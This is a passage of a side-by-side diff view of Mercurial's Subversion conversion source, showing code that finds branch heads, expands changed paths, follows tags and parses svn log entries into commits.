586 if not brevid:
577 self.ui.note(_(b'ignoring empty branch %s\n') % branch)
587 self.ui.note(_(b'ignoring empty branch %s\n') % branch)
578 continue
588 continue
579 self.ui.note(
589 self.ui.note(
580 _(b'found branch %s at %d\n')
590 _(b'found branch %s at %d\n')
581 % (branch, self.revnum(brevid))
591 % (branch, self.revnum(brevid))
582 )
592 )
583 self.heads.append(brevid)
593 self.heads.append(brevid)
584
594
585 if self.startrev and self.heads:
595 if self.startrev and self.heads:
586 if len(self.heads) > 1:
596 if len(self.heads) > 1:
587 raise error.Abort(
597 raise error.Abort(
588 _(
598 _(
589 b'svn: start revision is not supported '
599 b'svn: start revision is not supported '
590 b'with more than one branch'
600 b'with more than one branch'
591 )
601 )
592 )
602 )
593 revnum = self.revnum(self.heads[0])
603 revnum = self.revnum(self.heads[0])
594 if revnum < self.startrev:
604 if revnum < self.startrev:
595 raise error.Abort(
605 raise error.Abort(
596 _(b'svn: no revision found after start revision %d')
606 _(b'svn: no revision found after start revision %d')
597 % self.startrev
607 % self.startrev
598 )
608 )
599
609
600 return self.heads
610 return self.heads
601
611
602 def _getchanges(self, rev, full):
612 def _getchanges(self, rev, full):
603 (paths, parents) = self.paths[rev]
613 (paths, parents) = self.paths[rev]
604 copies = {}
614 copies = {}
605 if parents:
615 if parents:
606 files, self.removed, copies = self.expandpaths(rev, paths, parents)
616 files, self.removed, copies = self.expandpaths(rev, paths, parents)
607 if full or not parents:
617 if full or not parents:
608 # Perform a full checkout on roots
618 # Perform a full checkout on roots
609 uuid, module, revnum = revsplit(rev)
619 uuid, module, revnum = revsplit(rev)
610 entries = svn.client.ls(
620 entries = svn.client.ls(
611 self.baseurl + quote(module), optrev(revnum), True, self.ctx
621 self.baseurl + quote(module), optrev(revnum), True, self.ctx
612 )
622 )
613 files = [
623 files = [
614 n
624 n
615 for n, e in pycompat.iteritems(entries)
625 for n, e in pycompat.iteritems(entries)
616 if e.kind == svn.core.svn_node_file
626 if e.kind == svn.core.svn_node_file
617 ]
627 ]
618 self.removed = set()
628 self.removed = set()
619
629
620 files.sort()
630 files.sort()
621 files = pycompat.ziplist(files, [rev] * len(files))
631 files = pycompat.ziplist(files, [rev] * len(files))
622 return (files, copies)
632 return (files, copies)
623
633
624 def getchanges(self, rev, full):
634 def getchanges(self, rev, full):
625 # reuse cache from getchangedfiles
635 # reuse cache from getchangedfiles
626 if self._changescache[0] == rev and not full:
636 if self._changescache[0] == rev and not full:
627 (files, copies) = self._changescache[1]
637 (files, copies) = self._changescache[1]
628 else:
638 else:
629 (files, copies) = self._getchanges(rev, full)
639 (files, copies) = self._getchanges(rev, full)
630 # caller caches the result, so free it here to release memory
640 # caller caches the result, so free it here to release memory
631 del self.paths[rev]
641 del self.paths[rev]
632 return (files, copies, set())
642 return (files, copies, set())
633
643
634 def getchangedfiles(self, rev, i):
644 def getchangedfiles(self, rev, i):
635 # called from filemap - cache computed values for reuse in getchanges
645 # called from filemap - cache computed values for reuse in getchanges
636 (files, copies) = self._getchanges(rev, False)
646 (files, copies) = self._getchanges(rev, False)
637 self._changescache = (rev, (files, copies))
647 self._changescache = (rev, (files, copies))
638 return [f[0] for f in files]
648 return [f[0] for f in files]
639
649
640 def getcommit(self, rev):
650 def getcommit(self, rev):
641 if rev not in self.commits:
651 if rev not in self.commits:
642 uuid, module, revnum = revsplit(rev)
652 uuid, module, revnum = revsplit(rev)
643 self.module = module
653 self.module = module
644 self.reparent(module)
654 self.reparent(module)
645 # We assume that:
655 # We assume that:
646 # - requests for revisions after "stop" come from the
656 # - requests for revisions after "stop" come from the
647 # revision graph backward traversal. Cache all of them
657 # revision graph backward traversal. Cache all of them
648 # down to stop, they will be used eventually.
658 # down to stop, they will be used eventually.
649 # - requests for revisions before "stop" come to get
659 # - requests for revisions before "stop" come to get
650 # isolated branches parents. Just fetch what is needed.
660 # isolated branches parents. Just fetch what is needed.
651 stop = self.lastrevs.get(module, 0)
661 stop = self.lastrevs.get(module, 0)
652 if revnum < stop:
662 if revnum < stop:
653 stop = revnum + 1
663 stop = revnum + 1
654 self._fetch_revisions(revnum, stop)
664 self._fetch_revisions(revnum, stop)
655 if rev not in self.commits:
665 if rev not in self.commits:
656 raise error.Abort(_(b'svn: revision %s not found') % revnum)
666 raise error.Abort(_(b'svn: revision %s not found') % revnum)
657 revcommit = self.commits[rev]
667 revcommit = self.commits[rev]
658 # caller caches the result, so free it here to release memory
668 # caller caches the result, so free it here to release memory
659 del self.commits[rev]
669 del self.commits[rev]
660 return revcommit
670 return revcommit
661
671
662 def checkrevformat(self, revstr, mapname=b'splicemap'):
672 def checkrevformat(self, revstr, mapname=b'splicemap'):
663 """ fails if revision format does not match the correct format"""
673 """ fails if revision format does not match the correct format"""
664 if not re.match(
674 if not re.match(
665 br'svn:[0-9a-f]{8,8}-[0-9a-f]{4,4}-'
675 br'svn:[0-9a-f]{8,8}-[0-9a-f]{4,4}-'
666 br'[0-9a-f]{4,4}-[0-9a-f]{4,4}-[0-9a-f]'
676 br'[0-9a-f]{4,4}-[0-9a-f]{4,4}-[0-9a-f]'
667 br'{12,12}(.*)@[0-9]+$',
677 br'{12,12}(.*)@[0-9]+$',
668 revstr,
678 revstr,
669 ):
679 ):
670 raise error.Abort(
680 raise error.Abort(
671 _(b'%s entry %s is not a valid revision identifier')
681 _(b'%s entry %s is not a valid revision identifier')
672 % (mapname, revstr)
682 % (mapname, revstr)
673 )
683 )
674
684
675 def numcommits(self):
685 def numcommits(self):
676 return int(self.head.rsplit(b'@', 1)[1]) - self.startrev
686 return int(self.head.rsplit(b'@', 1)[1]) - self.startrev
677
687
678 def gettags(self):
688 def gettags(self):
679 tags = {}
689 tags = {}
680 if self.tags is None:
690 if self.tags is None:
681 return tags
691 return tags
682
692
683 # svn tags are just a convention, project branches left in a
693 # svn tags are just a convention, project branches left in a
684 # 'tags' directory. There is no other relationship than
694 # 'tags' directory. There is no other relationship than
685 # ancestry, which is expensive to discover and makes them hard
695 # ancestry, which is expensive to discover and makes them hard
686 # to update incrementally. Worse, past revisions may be
696 # to update incrementally. Worse, past revisions may be
687 # referenced by tags far away in the future, requiring a deep
697 # referenced by tags far away in the future, requiring a deep
688 # history traversal on every calculation. Current code
698 # history traversal on every calculation. Current code
689 # performs a single backward traversal, tracking moves within
699 # performs a single backward traversal, tracking moves within
690 # the tags directory (tag renaming) and recording a new tag
700 # the tags directory (tag renaming) and recording a new tag
691 # everytime a project is copied from outside the tags
701 # everytime a project is copied from outside the tags
692 # directory. It also lists deleted tags, this behaviour may
702 # directory. It also lists deleted tags, this behaviour may
693 # change in the future.
703 # change in the future.
694 pendings = []
704 pendings = []
695 tagspath = self.tags
705 tagspath = self.tags
696 start = svn.ra.get_latest_revnum(self.ra)
706 start = svn.ra.get_latest_revnum(self.ra)
697 stream = self._getlog([self.tags], start, self.startrev)
707 stream = self._getlog([self.tags], start, self.startrev)
698 try:
708 try:
699 for entry in stream:
709 for entry in stream:
700 origpaths, revnum, author, date, message = entry
710 origpaths, revnum, author, date, message = entry
701 if not origpaths:
711 if not origpaths:
702 origpaths = []
712 origpaths = []
703 copies = [
713 copies = [
704 (e.copyfrom_path, e.copyfrom_rev, p)
714 (e.copyfrom_path, e.copyfrom_rev, p)
705 for p, e in pycompat.iteritems(origpaths)
715 for p, e in pycompat.iteritems(origpaths)
706 if e.copyfrom_path
716 if e.copyfrom_path
707 ]
717 ]
708 # Apply moves/copies from more specific to general
718 # Apply moves/copies from more specific to general
709 copies.sort(reverse=True)
719 copies.sort(reverse=True)
710
720
711 srctagspath = tagspath
721 srctagspath = tagspath
712 if copies and copies[-1][2] == tagspath:
722 if copies and copies[-1][2] == tagspath:
713 # Track tags directory moves
723 # Track tags directory moves
714 srctagspath = copies.pop()[0]
724 srctagspath = copies.pop()[0]
715
725
716 for source, sourcerev, dest in copies:
726 for source, sourcerev, dest in copies:
717 if not dest.startswith(tagspath + b'/'):
727 if not dest.startswith(tagspath + b'/'):
718 continue
728 continue
719 for tag in pendings:
729 for tag in pendings:
720 if tag[0].startswith(dest):
730 if tag[0].startswith(dest):
721 tagpath = source + tag[0][len(dest) :]
731 tagpath = source + tag[0][len(dest) :]
722 tag[:2] = [tagpath, sourcerev]
732 tag[:2] = [tagpath, sourcerev]
723 break
733 break
724 else:
734 else:
725 pendings.append([source, sourcerev, dest])
735 pendings.append([source, sourcerev, dest])
726
736
727 # Filter out tags with children coming from different
737 # Filter out tags with children coming from different
728 # parts of the repository like:
738 # parts of the repository like:
729 # /tags/tag.1 (from /trunk:10)
739 # /tags/tag.1 (from /trunk:10)
730 # /tags/tag.1/foo (from /branches/foo:12)
740 # /tags/tag.1/foo (from /branches/foo:12)
731 # Here/tags/tag.1 discarded as well as its children.
741 # Here/tags/tag.1 discarded as well as its children.
732 # It happens with tools like cvs2svn. Such tags cannot
742 # It happens with tools like cvs2svn. Such tags cannot
733 # be represented in mercurial.
743 # be represented in mercurial.
734 addeds = {
744 addeds = {
735 p: e.copyfrom_path
745 p: e.copyfrom_path
736 for p, e in pycompat.iteritems(origpaths)
746 for p, e in pycompat.iteritems(origpaths)
737 if e.action == b'A' and e.copyfrom_path
747 if e.action == b'A' and e.copyfrom_path
738 }
748 }
739 badroots = set()
749 badroots = set()
740 for destroot in addeds:
750 for destroot in addeds:
741 for source, sourcerev, dest in pendings:
751 for source, sourcerev, dest in pendings:
742 if not dest.startswith(
752 if not dest.startswith(
743 destroot + b'/'
753 destroot + b'/'
744 ) or source.startswith(addeds[destroot] + b'/'):
754 ) or source.startswith(addeds[destroot] + b'/'):
745 continue
755 continue
746 badroots.add(destroot)
756 badroots.add(destroot)
747 break
757 break
748
758
749 for badroot in badroots:
759 for badroot in badroots:
750 pendings = [
760 pendings = [
751 p
761 p
752 for p in pendings
762 for p in pendings
753 if p[2] != badroot
763 if p[2] != badroot
754 and not p[2].startswith(badroot + b'/')
764 and not p[2].startswith(badroot + b'/')
755 ]
765 ]
756
766
757 # Tell tag renamings from tag creations
767 # Tell tag renamings from tag creations
758 renamings = []
768 renamings = []
759 for source, sourcerev, dest in pendings:
769 for source, sourcerev, dest in pendings:
760 tagname = dest.split(b'/')[-1]
770 tagname = dest.split(b'/')[-1]
761 if source.startswith(srctagspath):
771 if source.startswith(srctagspath):
762 renamings.append([source, sourcerev, tagname])
772 renamings.append([source, sourcerev, tagname])
763 continue
773 continue
764 if tagname in tags:
774 if tagname in tags:
765 # Keep the latest tag value
775 # Keep the latest tag value
766 continue
776 continue
767 # From revision may be fake, get one with changes
777 # From revision may be fake, get one with changes
768 try:
778 try:
769 tagid = self.latest(source, sourcerev)
779 tagid = self.latest(source, sourcerev)
770 if tagid and tagname not in tags:
780 if tagid and tagname not in tags:
771 tags[tagname] = tagid
781 tags[tagname] = tagid
772 except SvnPathNotFound:
782 except SvnPathNotFound:
773 # It happens when we are following directories
783 # It happens when we are following directories
774 # we assumed were copied with their parents
784 # we assumed were copied with their parents
775 # but were really created in the tag
785 # but were really created in the tag
776 # directory.
786 # directory.
777 pass
787 pass
778 pendings = renamings
788 pendings = renamings
779 tagspath = srctagspath
789 tagspath = srctagspath
780 finally:
790 finally:
781 stream.close()
791 stream.close()
782 return tags
792 return tags
783
793
784 def converted(self, rev, destrev):
794 def converted(self, rev, destrev):
785 if not self.wc:
795 if not self.wc:
786 return
796 return
787 if self.convertfp is None:
797 if self.convertfp is None:
788 self.convertfp = open(
798 self.convertfp = open(
789 os.path.join(self.wc, b'.svn', b'hg-shamap'), b'ab'
799 os.path.join(self.wc, b'.svn', b'hg-shamap'), b'ab'
790 )
800 )
791 self.convertfp.write(
801 self.convertfp.write(
792 util.tonativeeol(b'%s %d\n' % (destrev, self.revnum(rev)))
802 util.tonativeeol(b'%s %d\n' % (destrev, self.revnum(rev)))
793 )
803 )
794 self.convertfp.flush()
804 self.convertfp.flush()
795
805
796 def revid(self, revnum, module=None):
806 def revid(self, revnum, module=None):
797 return b'svn:%s%s@%d' % (self.uuid, module or self.module, revnum)
807 return b'svn:%s%s@%d' % (self.uuid, module or self.module, revnum)
798
808
799 def revnum(self, rev):
809 def revnum(self, rev):
800 return int(rev.split(b'@')[-1])
810 return int(rev.split(b'@')[-1])
801
811
802 def latest(self, path, stop=None):
812 def latest(self, path, stop=None):
803 """Find the latest revid affecting path, up to stop revision
813 """Find the latest revid affecting path, up to stop revision
804 number. If stop is None, default to repository latest
814 number. If stop is None, default to repository latest
805 revision. It may return a revision in a different module,
815 revision. It may return a revision in a different module,
806 since a branch may be moved without a change being
816 since a branch may be moved without a change being
807 reported. Return None if computed module does not belong to
817 reported. Return None if computed module does not belong to
808 rootmodule subtree.
818 rootmodule subtree.
809 """
819 """
810
820
811 def findchanges(path, start, stop=None):
821 def findchanges(path, start, stop=None):
812 stream = self._getlog([path], start, stop or 1)
822 stream = self._getlog([path], start, stop or 1)
813 try:
823 try:
814 for entry in stream:
824 for entry in stream:
815 paths, revnum, author, date, message = entry
825 paths, revnum, author, date, message = entry
816 if stop is None and paths:
826 if stop is None and paths:
817 # We do not know the latest changed revision,
827 # We do not know the latest changed revision,
818 # keep the first one with changed paths.
828 # keep the first one with changed paths.
819 break
829 break
820 if stop is not None and revnum <= stop:
830 if stop is not None and revnum <= stop:
821 break
831 break
822
832
823 for p in paths:
833 for p in paths:
824 if not path.startswith(p) or not paths[p].copyfrom_path:
834 if not path.startswith(p) or not paths[p].copyfrom_path:
825 continue
835 continue
826 newpath = paths[p].copyfrom_path + path[len(p) :]
836 newpath = paths[p].copyfrom_path + path[len(p) :]
827 self.ui.debug(
837 self.ui.debug(
828 b"branch renamed from %s to %s at %d\n"
838 b"branch renamed from %s to %s at %d\n"
829 % (path, newpath, revnum)
839 % (path, newpath, revnum)
830 )
840 )
831 path = newpath
841 path = newpath
832 break
842 break
833 if not paths:
843 if not paths:
834 revnum = None
844 revnum = None
835 return revnum, path
845 return revnum, path
836 finally:
846 finally:
837 stream.close()
847 stream.close()
838
848
839 if not path.startswith(self.rootmodule):
849 if not path.startswith(self.rootmodule):
840 # Requests on foreign branches may be forbidden at server level
850 # Requests on foreign branches may be forbidden at server level
841 self.ui.debug(b'ignoring foreign branch %r\n' % path)
851 self.ui.debug(b'ignoring foreign branch %r\n' % path)
842 return None
852 return None
843
853
844 if stop is None:
854 if stop is None:
845 stop = svn.ra.get_latest_revnum(self.ra)
855 stop = svn.ra.get_latest_revnum(self.ra)
846 try:
856 try:
847 prevmodule = self.reparent(b'')
857 prevmodule = self.reparent(b'')
848 dirent = svn.ra.stat(self.ra, path.strip(b'/'), stop)
858 dirent = svn.ra.stat(self.ra, path.strip(b'/'), stop)
849 self.reparent(prevmodule)
859 self.reparent(prevmodule)
850 except svn.core.SubversionException:
860 except svn.core.SubversionException:
851 dirent = None
861 dirent = None
852 if not dirent:
862 if not dirent:
853 raise SvnPathNotFound(
863 raise SvnPathNotFound(
854 _(b'%s not found up to revision %d') % (path, stop)
864 _(b'%s not found up to revision %d') % (path, stop)
855 )
865 )
856
866
857 # stat() gives us the previous revision on this line of
867 # stat() gives us the previous revision on this line of
858 # development, but it might be in *another module*. Fetch the
868 # development, but it might be in *another module*. Fetch the
859 # log and detect renames down to the latest revision.
869 # log and detect renames down to the latest revision.
860 revnum, realpath = findchanges(path, stop, dirent.created_rev)
870 revnum, realpath = findchanges(path, stop, dirent.created_rev)
861 if revnum is None:
871 if revnum is None:
862 # Tools like svnsync can create empty revision, when
872 # Tools like svnsync can create empty revision, when
863 # synchronizing only a subtree for instance. These empty
873 # synchronizing only a subtree for instance. These empty
864 # revisions created_rev still have their original values
874 # revisions created_rev still have their original values
865 # despite all changes having disappeared and can be
875 # despite all changes having disappeared and can be
866 # returned by ra.stat(), at least when stating the root
876 # returned by ra.stat(), at least when stating the root
867 # module. In that case, do not trust created_rev and scan
877 # module. In that case, do not trust created_rev and scan
868 # the whole history.
878 # the whole history.
869 revnum, realpath = findchanges(path, stop)
879 revnum, realpath = findchanges(path, stop)
870 if revnum is None:
880 if revnum is None:
871 self.ui.debug(b'ignoring empty branch %r\n' % realpath)
881 self.ui.debug(b'ignoring empty branch %r\n' % realpath)
872 return None
882 return None
873
883
874 if not realpath.startswith(self.rootmodule):
884 if not realpath.startswith(self.rootmodule):
875 self.ui.debug(b'ignoring foreign branch %r\n' % realpath)
885 self.ui.debug(b'ignoring foreign branch %r\n' % realpath)
876 return None
886 return None
877 return self.revid(revnum, realpath)
887 return self.revid(revnum, realpath)
878
888
879 def reparent(self, module):
889 def reparent(self, module):
880 """Reparent the svn transport and return the previous parent."""
890 """Reparent the svn transport and return the previous parent."""
881 if self.prevmodule == module:
891 if self.prevmodule == module:
882 return module
892 return module
883 svnurl = self.baseurl + quote(module)
893 svnurl = self.baseurl + quote(module)
884 prevmodule = self.prevmodule
894 prevmodule = self.prevmodule
885 if prevmodule is None:
895 if prevmodule is None:
886 prevmodule = b''
896 prevmodule = b''
887 self.ui.debug(b"reparent to %s\n" % svnurl)
897 self.ui.debug(b"reparent to %s\n" % svnurl)
888 svn.ra.reparent(self.ra, svnurl)
898 svn.ra.reparent(self.ra, svnurl)
889 self.prevmodule = module
899 self.prevmodule = module
890 return prevmodule
900 return prevmodule
891
901
892 def expandpaths(self, rev, paths, parents):
902 def expandpaths(self, rev, paths, parents):
893 changed, removed = set(), set()
903 changed, removed = set(), set()
894 copies = {}
904 copies = {}
895
905
896 new_module, revnum = revsplit(rev)[1:]
906 new_module, revnum = revsplit(rev)[1:]
897 if new_module != self.module:
907 if new_module != self.module:
898 self.module = new_module
908 self.module = new_module
899 self.reparent(self.module)
909 self.reparent(self.module)
900
910
901 progress = self.ui.makeprogress(
911 progress = self.ui.makeprogress(
902 _(b'scanning paths'), unit=_(b'paths'), total=len(paths)
912 _(b'scanning paths'), unit=_(b'paths'), total=len(paths)
903 )
913 )
904 for i, (path, ent) in enumerate(paths):
914 for i, (path, ent) in enumerate(paths):
905 progress.update(i, item=path)
915 progress.update(i, item=path)
906 entrypath = self.getrelpath(path)
916 entrypath = self.getrelpath(path)
907
917
908 kind = self._checkpath(entrypath, revnum)
918 kind = self._checkpath(entrypath, revnum)
909 if kind == svn.core.svn_node_file:
919 if kind == svn.core.svn_node_file:
910 changed.add(self.recode(entrypath))
920 changed.add(self.recode(entrypath))
911 if not ent.copyfrom_path or not parents:
921 if not ent.copyfrom_path or not parents:
912 continue
922 continue
913 # Copy sources not in parent revisions cannot be
923 # Copy sources not in parent revisions cannot be
914 # represented, ignore their origin for now
924 # represented, ignore their origin for now
915 pmodule, prevnum = revsplit(parents[0])[1:]
925 pmodule, prevnum = revsplit(parents[0])[1:]
916 if ent.copyfrom_rev < prevnum:
926 if ent.copyfrom_rev < prevnum:
917 continue
927 continue
918 copyfrom_path = self.getrelpath(ent.copyfrom_path, pmodule)
928 copyfrom_path = self.getrelpath(ent.copyfrom_path, pmodule)
919 if not copyfrom_path:
929 if not copyfrom_path:
920 continue
930 continue
921 self.ui.debug(
931 self.ui.debug(
922 b"copied to %s from %s@%d\n"
932 b"copied to %s from %s@%d\n"
923 % (entrypath, copyfrom_path, ent.copyfrom_rev)
933 % (entrypath, copyfrom_path, ent.copyfrom_rev)
924 )
934 )
925 copies[self.recode(entrypath)] = self.recode(copyfrom_path)
935 copies[self.recode(entrypath)] = self.recode(copyfrom_path)
926 elif kind == 0: # gone, but had better be a deleted *file*
936 elif kind == 0: # gone, but had better be a deleted *file*
927 self.ui.debug(b"gone from %d\n" % ent.copyfrom_rev)
937 self.ui.debug(b"gone from %d\n" % ent.copyfrom_rev)
928 pmodule, prevnum = revsplit(parents[0])[1:]
938 pmodule, prevnum = revsplit(parents[0])[1:]
929 parentpath = pmodule + b"/" + entrypath
939 parentpath = pmodule + b"/" + entrypath
930 fromkind = self._checkpath(entrypath, prevnum, pmodule)
940 fromkind = self._checkpath(entrypath, prevnum, pmodule)
931
941
932 if fromkind == svn.core.svn_node_file:
942 if fromkind == svn.core.svn_node_file:
933 removed.add(self.recode(entrypath))
943 removed.add(self.recode(entrypath))
934 elif fromkind == svn.core.svn_node_dir:
944 elif fromkind == svn.core.svn_node_dir:
935 oroot = parentpath.strip(b'/')
945 oroot = parentpath.strip(b'/')
936 nroot = path.strip(b'/')
946 nroot = path.strip(b'/')
937 children = self._iterfiles(oroot, prevnum)
947 children = self._iterfiles(oroot, prevnum)
938 for childpath in children:
948 for childpath in children:
939 childpath = childpath.replace(oroot, nroot)
949 childpath = childpath.replace(oroot, nroot)
940 childpath = self.getrelpath(b"/" + childpath, pmodule)
950 childpath = self.getrelpath(b"/" + childpath, pmodule)
941 if childpath:
951 if childpath:
942 removed.add(self.recode(childpath))
952 removed.add(self.recode(childpath))
943 else:
953 else:
944 self.ui.debug(
954 self.ui.debug(
945 b'unknown path in revision %d: %s\n' % (revnum, path)
955 b'unknown path in revision %d: %s\n' % (revnum, path)
946 )
956 )
947 elif kind == svn.core.svn_node_dir:
957 elif kind == svn.core.svn_node_dir:
948 if ent.action == b'M':
958 if ent.action == b'M':
949 # If the directory just had a prop change,
959 # If the directory just had a prop change,
950 # then we shouldn't need to look for its children.
960 # then we shouldn't need to look for its children.
951 continue
961 continue
952 if ent.action == b'R' and parents:
962 if ent.action == b'R' and parents:
953 # If a directory is replacing a file, mark the previous
963 # If a directory is replacing a file, mark the previous
954 # file as deleted
964 # file as deleted
955 pmodule, prevnum = revsplit(parents[0])[1:]
965 pmodule, prevnum = revsplit(parents[0])[1:]
956 pkind = self._checkpath(entrypath, prevnum, pmodule)
966 pkind = self._checkpath(entrypath, prevnum, pmodule)
957 if pkind == svn.core.svn_node_file:
967 if pkind == svn.core.svn_node_file:
958 removed.add(self.recode(entrypath))
968 removed.add(self.recode(entrypath))
959 elif pkind == svn.core.svn_node_dir:
969 elif pkind == svn.core.svn_node_dir:
960 # We do not know what files were kept or removed,
970 # We do not know what files were kept or removed,
961 # mark them all as changed.
971 # mark them all as changed.
962 for childpath in self._iterfiles(pmodule, prevnum):
972 for childpath in self._iterfiles(pmodule, prevnum):
963 childpath = self.getrelpath(b"/" + childpath)
973 childpath = self.getrelpath(b"/" + childpath)
964 if childpath:
974 if childpath:
965 changed.add(self.recode(childpath))
975 changed.add(self.recode(childpath))
966
976
967 for childpath in self._iterfiles(path, revnum):
977 for childpath in self._iterfiles(path, revnum):
968 childpath = self.getrelpath(b"/" + childpath)
978 childpath = self.getrelpath(b"/" + childpath)
969 if childpath:
979 if childpath:
970 changed.add(self.recode(childpath))
980 changed.add(self.recode(childpath))
971
981
972 # Handle directory copies
982 # Handle directory copies
973 if not ent.copyfrom_path or not parents:
983 if not ent.copyfrom_path or not parents:
974 continue
984 continue
975 # Copy sources not in parent revisions cannot be
985 # Copy sources not in parent revisions cannot be
976 # represented, ignore their origin for now
986 # represented, ignore their origin for now
977 pmodule, prevnum = revsplit(parents[0])[1:]
987 pmodule, prevnum = revsplit(parents[0])[1:]
978 if ent.copyfrom_rev < prevnum:
988 if ent.copyfrom_rev < prevnum:
979 continue
989 continue
980 copyfrompath = self.getrelpath(ent.copyfrom_path, pmodule)
990 copyfrompath = self.getrelpath(ent.copyfrom_path, pmodule)
981 if not copyfrompath:
991 if not copyfrompath:
982 continue
992 continue
983 self.ui.debug(
993 self.ui.debug(
984 b"mark %s came from %s:%d\n"
994 b"mark %s came from %s:%d\n"
985 % (path, copyfrompath, ent.copyfrom_rev)
995 % (path, copyfrompath, ent.copyfrom_rev)
986 )
996 )
987 children = self._iterfiles(ent.copyfrom_path, ent.copyfrom_rev)
997 children = self._iterfiles(ent.copyfrom_path, ent.copyfrom_rev)
988 for childpath in children:
998 for childpath in children:
989 childpath = self.getrelpath(b"/" + childpath, pmodule)
999 childpath = self.getrelpath(b"/" + childpath, pmodule)
990 if not childpath:
1000 if not childpath:
991 continue
1001 continue
992 copytopath = path + childpath[len(copyfrompath) :]
1002 copytopath = path + childpath[len(copyfrompath) :]
993 copytopath = self.getrelpath(copytopath)
1003 copytopath = self.getrelpath(copytopath)
994 copies[self.recode(copytopath)] = self.recode(childpath)
1004 copies[self.recode(copytopath)] = self.recode(childpath)
995
1005
996 progress.complete()
1006 progress.complete()
997 changed.update(removed)
1007 changed.update(removed)
998 return (list(changed), removed, copies)
1008 return (list(changed), removed, copies)
999
1009
1000 def _fetch_revisions(self, from_revnum, to_revnum):
1010 def _fetch_revisions(self, from_revnum, to_revnum):
1001 if from_revnum < to_revnum:
1011 if from_revnum < to_revnum:
1002 from_revnum, to_revnum = to_revnum, from_revnum
1012 from_revnum, to_revnum = to_revnum, from_revnum
1003
1013
1004 self.child_cset = None
1014 self.child_cset = None
1005
1015
1006 def parselogentry(orig_paths, revnum, author, date, message):
1016 def parselogentry(orig_paths, revnum, author, date, message):
1007 """Return the parsed commit object or None, and True if
1017 """Return the parsed commit object or None, and True if
1008 the revision is a branch root.
1018 the revision is a branch root.
1009 """
1019 """
1010 self.ui.debug(
1020 self.ui.debug(
1011 b"parsing revision %d (%d changes)\n"
1021 b"parsing revision %d (%d changes)\n"
1012 % (revnum, len(orig_paths))
1022 % (revnum, len(orig_paths))
1013 )
1023 )
1014
1024
1015 branched = False
1025 branched = False
1016 rev = self.revid(revnum)
1026 rev = self.revid(revnum)
1017 # branch log might return entries for a parent we already have
1027 # branch log might return entries for a parent we already have
1018
1028
1019 if rev in self.commits or revnum < to_revnum:
1029 if rev in self.commits or revnum < to_revnum:
1020 return None, branched
1030 return None, branched
1021
1031
1022 parents = []
1032 parents = []
1023 # check whether this revision is the start of a branch or part
1033 # check whether this revision is the start of a branch or part
1024 # of a branch renaming
1034 # of a branch renaming
1025 orig_paths = sorted(pycompat.iteritems(orig_paths))
1035 orig_paths = sorted(pycompat.iteritems(orig_paths))
1026 root_paths = [
1036 root_paths = [
1027 (p, e) for p, e in orig_paths if self.module.startswith(p)
1037 (p, e) for p, e in orig_paths if self.module.startswith(p)
1028 ]
1038 ]
1029 if root_paths:
1039 if root_paths:
1030 path, ent = root_paths[-1]
1040 path, ent = root_paths[-1]
1031 if ent.copyfrom_path:
1041 if ent.copyfrom_path:
1032 branched = True
1042 branched = True
1033 newpath = ent.copyfrom_path + self.module[len(path) :]
1043 newpath = ent.copyfrom_path + self.module[len(path) :]
1034 # ent.copyfrom_rev may not be the actual last revision
1044 # ent.copyfrom_rev may not be the actual last revision
1035 previd = self.latest(newpath, ent.copyfrom_rev)
1045 previd = self.latest(newpath, ent.copyfrom_rev)
1036 if previd is not None:
1046 if previd is not None:
1037 prevmodule, prevnum = revsplit(previd)[1:]
1047 prevmodule, prevnum = revsplit(previd)[1:]
1038 if prevnum >= self.startrev:
1048 if prevnum >= self.startrev:
1039 parents = [previd]
1049 parents = [previd]
1040 self.ui.note(
1050 self.ui.note(
1041 _(b'found parent of branch %s at %d: %s\n')
1051 _(b'found parent of branch %s at %d: %s\n')
1042 % (self.module, prevnum, prevmodule)
1052 % (self.module, prevnum, prevmodule)
1043 )
1053 )
1044 else:
1054 else:
1045 self.ui.debug(b"no copyfrom path, don't know what to do.\n")
1055 self.ui.debug(b"no copyfrom path, don't know what to do.\n")
1046
1056
1047 paths = []
1057 paths = []
1048 # filter out unrelated paths
1058 # filter out unrelated paths
1049 for path, ent in orig_paths:
1059 for path, ent in orig_paths:
1050 if self.getrelpath(path) is None:
1060 if self.getrelpath(path) is None:
1051 continue
1061 continue
1052 paths.append((path, ent))
1062 paths.append((path, ent))
1053
1063
1054 # Example SVN datetime. Includes microseconds.
1064 # Example SVN datetime. Includes microseconds.
1055 # ISO-8601 conformant
1065 # ISO-8601 conformant
1056 # '2007-01-04T17:35:00.902377Z'
1066 # '2007-01-04T17:35:00.902377Z'
1057 date = dateutil.parsedate(
1067 date = dateutil.parsedate(
1058 date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"]
1068 date[:19] + b" UTC", [b"%Y-%m-%dT%H:%M:%S"]
1059 )
1069 )
1060 if self.ui.configbool(b'convert', b'localtimezone'):
1070 if self.ui.configbool(b'convert', b'localtimezone'):
1061 date = makedatetimestamp(date[0])
1071 date = makedatetimestamp(date[0])
1062
1072
1063 if message:
1073 if message:
1064 log = self.recode(message)
1074 log = self.recode(message)
1065 else:
1075 else:
1066 log = b''
1076 log = b''
1067
1077
1068 if author:
1078 if author:
1069 author = self.recode(author)
1079 author = self.recode(author)
1070 else:
1080 else:
1071 author = b''
1081 author = b''
1072
1082
1073 try:
1083 try:
1074 branch = self.module.split(b"/")[-1]
1084 branch = self.module.split(b"/")[-1]
1075 if branch == self.trunkname:
1085 if branch == self.trunkname:
1076 branch = None
1086 branch = None
1077 except IndexError:
1087 except IndexError:
1078 branch = None
1088 branch = None
1079
1089
1080 cset = commit(
1090 cset = commit(
1081 author=author,
1091 author=author,
1082 date=dateutil.datestr(date, b'%Y-%m-%d %H:%M:%S %1%2'),
1092 date=dateutil.datestr(date, b'%Y-%m-%d %H:%M:%S %1%2'),
1083 desc=log,
1093 desc=log,
1084 parents=parents,
1094 parents=parents,
1085 branch=branch,
1095 branch=branch,
1086 rev=rev,
1096 rev=rev,
1087 )
1097 )
1088
1098
1089 self.commits[rev] = cset
1099 self.commits[rev] = cset
1090 # The parents list is *shared* among self.paths and the
1100 # The parents list is *shared* among self.paths and the
1091 # commit object. Both will be updated below.
1101 # commit object. Both will be updated below.
1092 self.paths[rev] = (paths, cset.parents)
1102 self.paths[rev] = (paths, cset.parents)
1093 if self.child_cset and not self.child_cset.parents:
1103 if self.child_cset and not self.child_cset.parents:
1094 self.child_cset.parents[:] = [rev]
1104 self.child_cset.parents[:] = [rev]
1095 self.child_cset = cset
1105 self.child_cset = cset
1096 return cset, branched
1106 return cset, branched
1097
1107
1098 self.ui.note(
1108 self.ui.note(
